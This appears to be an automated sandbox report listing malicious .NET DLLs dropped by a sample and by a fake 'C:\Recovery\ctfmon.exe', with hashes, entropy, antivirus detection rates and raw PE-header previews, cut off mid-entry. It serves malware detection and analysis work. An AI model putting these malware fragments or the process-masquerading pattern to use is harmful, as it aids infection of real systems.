                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):39936
                                                  Entropy (8bit):5.660491370279985
                                                  Encrypted:false
                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                  MD5:240E98D38E0B679F055470167D247022
                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):38912
                                                  Entropy (8bit):5.679286635687991
                                                  Encrypted:false
                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):41472
                                                  Entropy (8bit):5.6808219961645605
                                                  Encrypted:false
                                                  SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                  MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                  SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                  SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                  SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 17%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):34816
                                                  Entropy (8bit):5.636032516496583
                                                  Encrypted:false
SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
MD5:996BD447A16F0A20F238A611484AFE86
SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 21%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):64000
Entropy (8bit):5.857602289000348
Encrypted:false
SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:5EE7E079F998F80293B3467CE6A5B4AE
SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 25%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Recovery\ctfmon.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):24576
Entropy (8bit):5.535426842040921
Encrypted:false
SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:5420053AF2D273C456FB46C2CDD68F64
SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 17%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Recovery\ctfmon.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):22016
Entropy (8bit):5.41854385721431
Encrypted:false
SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:BBDE7073BAAC996447F749992D65FFBA
SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 9%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):39936
Entropy (8bit):5.629584586954759
Encrypted:false
SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 17%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):34304
Entropy (8bit):5.618776214605176
Encrypted:false
SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
MD5:9B25959D6CD6097C0EF36D2496876249
SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 9%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Recovery\ctfmon.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):69632
Entropy (8bit):5.932541123129161
Encrypted:false
SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):24064
Entropy (8bit):5.4346552043530165
Encrypted:false
SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 6%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e...........!.....V...........t... ........@.. ....................................@..................................s..S.................................................................................... ............... ..H............text....T... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................s......H........Q..."...........O......................................................................................................................................................................xHz9..T....[.y..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):36352
Entropy (8bit):5.668291349855899
Encrypted:false
SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
MD5:94DA5073CCC14DCF4766DF6781485937
SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 21%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):22016
Entropy (8bit):5.41854385721431
Encrypted:false
SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
MD5:BBDE7073BAAC996447F749992D65FFBA
SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 9%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Recovery\ctfmon.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):50176
Entropy (8bit):5.723168999026349
Encrypted:false
SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
MD5:2E116FC64103D0F0CF47890FD571561E
SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 17%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):33280
Entropy (8bit):5.634433516692816
Encrypted:false
SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 8%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Recovery\ctfmon.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):28160
Entropy (8bit):5.570953308352568
Encrypted:false
SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
MD5:A4F19ADB89F8D88DBDF103878CF31608
SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 4%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....s.e...........!.....f..........^.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...dd... ...f.................. ..`.rsrc................h..............@..@.reloc...............l..............@..B................@.......H........X..4+...........W..(..................................................................................................................................................................._..\.....+....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Users\user\Desktop\85D5ktqjpd.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):38400
Entropy (8bit):5.699005826018714
Encrypted:false
SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
MD5:87765D141228784AE91334BAE25AD743
SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 25%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

Process:C:\Recovery\ctfmon.exe
File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):342528
Entropy (8bit):6.170134230759619
Encrypted:false
SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):46592
                                                  Entropy (8bit):5.870612048031897
                                                  Encrypted:false
                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):40448
                                                  Entropy (8bit):5.7028690200758465
                                                  Encrypted:false
                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 12%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):89600
                                                  Entropy (8bit):5.905167202474779
                                                  Encrypted:false
                                                  SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                  MD5:06442F43E1001D860C8A19A752F19085
                                                  SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                  SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                  SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 16%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.........." .....V...........t... ........@.. ....................................@.................................pt..K.......l............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...l............X..............@..@.reloc...............\..............@..B.................t......H.......H...(q..........P.........................................................................n$..Fr.....fQ...M.:..'k.m.(G.c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW....
                                                  Process:C:\Users\user\Desktop\85D5ktqjpd.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):294912
                                                  Entropy (8bit):6.010605469502259
                                                  Encrypted:false
                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                  Process:C:\Recovery\ctfmon.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):70144
                                                  Entropy (8bit):5.909536568846014
